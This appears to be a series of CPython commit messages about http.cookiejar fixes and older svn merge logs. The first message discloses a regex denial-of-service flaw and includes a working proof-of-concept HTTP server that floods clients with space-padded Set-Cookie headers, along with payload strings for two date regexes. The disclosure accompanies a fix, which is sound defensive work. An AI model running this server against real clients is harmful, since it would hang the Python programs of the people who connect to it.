The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) # Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 # Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): # Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
Handle time comparison for cookies with `expires` attribute when `CookieJar.make_cookies` is called.
Co-authored-by: Demian Brecht <demianbrecht@gmail.com>
https://bugs.python.org/issue12144
Automerge-Triggered-By: @asvetlov
* Refactor cookie path check as per RFC 6265
* Add tests for prefix match of path
* Add news entry
* Fix set_ok_path and refactor tests
* Use slice for last letter
Don't send cookies of domain A without Domain attribute to domain B when domain A is a suffix match of domain B while using a cookiejar with `http.cookiejar.DefaultCookiePolicy` policy. Patch by Karthikeyan Singaravelan.
svn+ssh://svn.python.org/python/branches/py3k
........
r83370 | georg.brandl | 2010-07-31 23:51:48 +0200 (Sa, 31 Jul 2010) | 5 lines
#8198: the Helper class should not save the stdin and stdout objects
at import time, rather by default use the current streams like the
other APIs that output help.
........
r83372 | georg.brandl | 2010-08-01 00:05:54 +0200 (So, 01 Aug 2010) | 1 line
#4007: remove *.a and *.so.X.Y files in "make clean".
........
r83373 | georg.brandl | 2010-08-01 00:11:11 +0200 (So, 01 Aug 2010) | 1 line
#5147: revert accidental indentation of header constant for MozillaCookieJar.
........
r83374 | georg.brandl | 2010-08-01 00:32:52 +0200 (So, 01 Aug 2010) | 1 line
#5146: handle UID THREAD command correctly.
........
r83384 | georg.brandl | 2010-08-01 08:32:55 +0200 (So, 01 Aug 2010) | 1 line
Build properties using lambdas. This makes test_pyclbr pass again, because it does not think that input and output are methods anymore.
........
svn+ssh://pythondev@svn.python.org/python/branches/py3k
........
r82985 | gregory.p.smith | 2010-07-19 16:17:22 -0700 (Mon, 19 Jul 2010) | 3 lines
Fixes Issue #3704: http.cookiejar was not properly handling URLs with a / in
the parameters. (This is jjlee's issue3704.patch ported to py3k)
........
svn+ssh://pythondev@svn.python.org/python/trunk
........
r81465 | georg.brandl | 2010-05-22 06:29:19 -0500 (Sat, 22 May 2010) | 2 lines
Issue #3924: Ignore cookies with invalid "version" field in cookielib.
........
r81466 | georg.brandl | 2010-05-22 06:31:16 -0500 (Sat, 22 May 2010) | 1 line
Underscore the name of an internal utility function.
........
r81468 | georg.brandl | 2010-05-22 06:43:25 -0500 (Sat, 22 May 2010) | 1 line
#8635: document enumerate() start parameter in docstring.
........
r81679 | benjamin.peterson | 2010-06-03 16:21:03 -0500 (Thu, 03 Jun 2010) | 1 line
use a set for membership testing
........
r81735 | michael.foord | 2010-06-05 06:46:59 -0500 (Sat, 05 Jun 2010) | 1 line
Extract error message truncating into a method (unittest.TestCase._truncateMessage).
........
r81760 | michael.foord | 2010-06-05 14:38:42 -0500 (Sat, 05 Jun 2010) | 1 line
Issue 8302. SkipTest exception is setUpClass or setUpModule is now reported as a skip rather than an error.
........
r81868 | benjamin.peterson | 2010-06-09 14:45:04 -0500 (Wed, 09 Jun 2010) | 1 line
fix code formatting
........
r82183 | benjamin.peterson | 2010-06-23 15:29:26 -0500 (Wed, 23 Jun 2010) | 1 line
cpython only gc tests
........
It consists of code from urllib, urllib2, urlparse, and robotparser.
The old modules have all been removed. The new package has five
submodules: urllib.parse, urllib.request, urllib.response,
urllib.error, and urllib.robotparser. The urllib.request.urlopen()
function uses the url opener from urllib2.
Note that the unittests have not been renamed for the
beta, but they will be renamed in the future.
Joint work with Senthil Kumaran.